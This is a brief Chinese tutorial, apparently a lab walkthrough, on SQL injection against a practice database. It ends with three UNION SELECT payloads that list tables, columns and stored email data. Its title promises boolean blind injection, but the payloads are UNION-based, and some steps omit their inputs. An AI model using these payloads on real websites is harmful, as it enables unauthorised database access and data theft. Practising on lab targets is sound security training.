布尔盲注:
布尔型:页面只返回True和False两种类型页面
盲注:盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注
相关wp:SQL盲注注入——布尔型_布尔型注入_莫者的博客-CSDN博客
1.判断注入类型
输入
单引号,页面报错
双引号,页面报错
说明不是字符型注入
输入数值
第二个页面报错,说明是数字型注入。
2.猜解列名字段数
说明有3个列名字段数
3.报错猜解准备
数据显示位为2和3
信息收集
得到数据库用户,数据库版本,操作系统,和数据库名字
4.查询指定数据库下的表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'
5.查询指定表名下的列名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails'
6.查询指定数据
?id=-1 union select 1,group_concat(email_id),3 from emails